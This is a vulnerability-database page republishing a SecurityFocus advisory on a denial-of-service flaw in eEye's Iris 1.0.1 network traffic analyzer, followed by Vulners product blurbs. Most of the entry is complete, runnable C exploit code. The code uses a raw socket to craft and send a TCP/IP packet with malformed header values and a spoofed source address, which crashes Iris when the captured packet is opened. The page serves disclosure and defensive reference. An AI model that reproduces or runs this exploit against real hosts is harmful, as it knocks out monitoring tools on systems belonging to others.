Vulners
Lucene search
eEye Digital Security IRIS 1.0.1 GET Denial of Service Vulnerability
source: http://www.securityfocus.com/bid/2278/info
A maliciously-formed packet sent to Iris by a remote attacker, upon opening in the program for analysis by a user, will cause Iris to terminate.
The crash is caused by an inability of Iris to handle packets with malformed values in its headers.
/* Denial of Service attack against :
* Iris The Network Traffic Analyzer beta 1.01
* ------------------------------------------------
*
* Will create an incorrect packet which will cause
* Iris to hang when it is opened by a user.
*
* Vulnerability found by : [email protected]
* Exploit code by : [email protected]
*
* Respect to the guys from eEye, for there fast
* response.
*
* greetings to hit2000, hwa, synnergy, security.is
* digit-labs.
*
* ---------------> free sk8!!!! <-----------------
*
* ------------------------------------------------
* http://www.digit-labs.org
* [email protected]
* ------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <sys/types.h>
#include <sys/socket.h>
int build_packet(int sfd, u_long srcaddr, u_long dstaddr);
struct pseudo {
u_long saddr;
u_long daddr;
u_char zero;
u_char protocol;
u_short length;
};
int main(int argc,char **argv){
int rawfd, check, one=1;
struct sockaddr_in raddr;
struct in_addr source_ip, desti_ip;
struct ip *ip;
struct tcphdr *tcp;
while (argc<3) {
fprintf(stderr, "\n\n[ IRIS DoS attack - by grazer ]");
fprintf(stderr, "\n %s localhost remotehost \n\n", argv[0] ); exit(0);}
fprintf(stderr, "\nStarting Iris DoS...\n");
if((check=gethostbyname(argv[2])==NULL)) {
fprintf(stderr, "\nCannot resolve host %s\n", argv[2]); exit(0); }
source_ip.s_addr= inet_addr(argv[1]);
desti_ip.s_addr = inet_addr(argv[2]);
if ((rawfd=socket(PF_INET, SOCK_RAW, IPPROTO_TCP))<0) {
fprintf(stderr, "\n You need root for this..");
exit(0); }
setsockopt(rawfd, IPPROTO_IP, IP_HDRINCL, &one, 1);
build_packet(rawfd,source_ip.s_addr, desti_ip.s_addr);
close(rawfd);
return 1; }
int build_packet(int sfd, u_long srcaddr, u_long dstaddr) {
u_char packet[sizeof(struct ip) + sizeof(struct pseudo) + sizeof(struct tcphdr)];
struct sockaddr_in sin;
struct in_addr src_inaddr, dest_inaddr;
struct ip *ip = (struct ip *) packet;
struct pseudo *pseudo = (struct pseudo *) (packet + sizeof(struct ip));
struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct ip)
+ sizeof(struct pseudo));
bzero(packet, sizeof(packet));
bzero(&sin,sizeof(sin));
src_inaddr.s_addr = srcaddr;
dest_inaddr.s_addr = dstaddr;
pseudo->saddr = srcaddr;
pseudo->daddr = dstaddr;
pseudo->zero = 1;
pseudo->protocol=IPPROTO_TCP;
pseudo->length = htons(sizeof (struct tcphdr));
ip->ip_v = -1;
ip->ip_hl = -1;
ip->ip_id = -1;
ip->ip_src = src_inaddr;
ip->ip_dst = dest_inaddr;
ip->ip_p = IPPROTO_TCP;
ip->ip_ttl = 40;
ip->ip_off = -1;
ip->ip_len = sizeof(struct ip) + sizeof(struct tcphdr);
tcp->seq = htonl(rand());
tcp->ack = htonl(rand());
sin.sin_family=AF_INET;
sin.sin_addr.s_addr=dstaddr;
sendto(sfd,packet,sizeof(struct ip) + sizeof(struct tcphdr), 0,
(struct sockaddr *) &sin,sizeof(sin));
fprintf(stderr, "\n Packet send... \n\n" );
return 1;}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1